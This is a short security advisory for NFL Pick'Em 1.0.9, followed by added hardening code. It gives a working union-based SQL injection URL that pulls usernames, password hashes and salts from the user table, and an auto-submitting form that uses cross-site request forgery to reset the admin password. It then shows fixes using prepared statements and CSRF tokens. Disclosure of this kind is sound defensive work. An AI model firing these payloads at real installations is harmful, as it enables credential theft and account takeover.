NFL Pick'Em <= 1.0.9 Multiple vulnerabilities


# Version: 1.0.9
# Dork: Not yet

SQL Injection
=============

---------------[schedules.php]---------------

$week = $_GET['week']; // L.7
$where .= " where weekNum = " . $week; // L.53

// L.56
$sql .= $where . " order by gameTimeEastern";
$query = mysql_query($sql);

---------------[schedules.php]---------------

The week GET parameter is therefore concatenated into the query without any validation or escaping, so it can be injected directly.

PoC: http://pentest.lan/pickem/schedules.php?week=-3%20union%20select%201,%28SELECT%20concat%28username,%200x3a,%20password,%200x3a,%20salt%29%20FROM%20nflp_users%20LIMIT%201%29,3,4,5,6,7,8,9,10,11,12,13,14--%20-

(Simple union-based injection that returns a username, password and salt from the nflp_users table)

Cross site request forgery
==========================

<body onload='document.forms[0].submit()'>
<form method='post' action='http://pentest.lan/pickem/user_edit.php'>
<input type='hidden' name='firstname' value='Admin'>
<input type='hidden' name='lastname' value='Admin'>
<input type='hidden' name='email' value='admin%40yourdomain.com'>
<input type='hidden' name='password' value='aaaaaa'>
<input type='hidden' name='password2' value='aaaaaa'>
<input type='hidden' name='submit' value='Submit'>

</form>
</body>
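A hardened replacement for both of the spots above, added here as an example and not code from the NFL Pick'Em project. It swaps the deprecated mysql_* calls for PDO and assumes a PDO connection in $pdo, an active session, and a schedule table named nflp_schedule (the advisory only shows the weekNum column and the nflp_users table).

```php
<?php
// Added hardening example, not code from NFL Pick'Em. Assumes session_start()
// has run, a PDO connection in $pdo, and a table named "nflp_schedule"
// (the advisory only shows the weekNum column and the nflp_users table).

// --- schedules.php: replaces the concatenated "where weekNum = " . $week ---
function buildScheduleQuery(PDO $pdo, array $get): PDOStatement
{
    // Accept only a small positive integer; anything else (including the
    // union payload in the PoC above) is rejected before it reaches SQL.
    $week = filter_var($get['week'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 22]]);
    if ($week === false) {
        http_response_code(400);
        exit('invalid week');
    }
    // Bind the value as a typed parameter instead of building $where by hand.
    $stmt = $pdo->prepare(
        'SELECT * FROM nflp_schedule WHERE weekNum = :week ORDER BY gameTimeEastern'
    );
    $stmt->bindValue(':week', $week, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt;
}

// --- user_edit.php: tie the POST to a per-session secret that a form on
// --- another origin cannot read or guess ---
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Render csrfToken() into the edit form as a hidden input named "csrf_token"
// (passed through htmlspecialchars), then call this at the top of the POST handler.
function requireValidCsrfToken(array $post): void
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $sent     = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time; the empty-string guard matters
    // because hash_equals('', '') would otherwise succeed when no token is set.
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('invalid or missing CSRF token');
    }
}
```

With the token check in place the auto-submitting form above is rejected with a 403 because it cannot supply the victim's session token; the integer filter and bound parameter make the week value inert even if it still reaches the query.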

Groucho

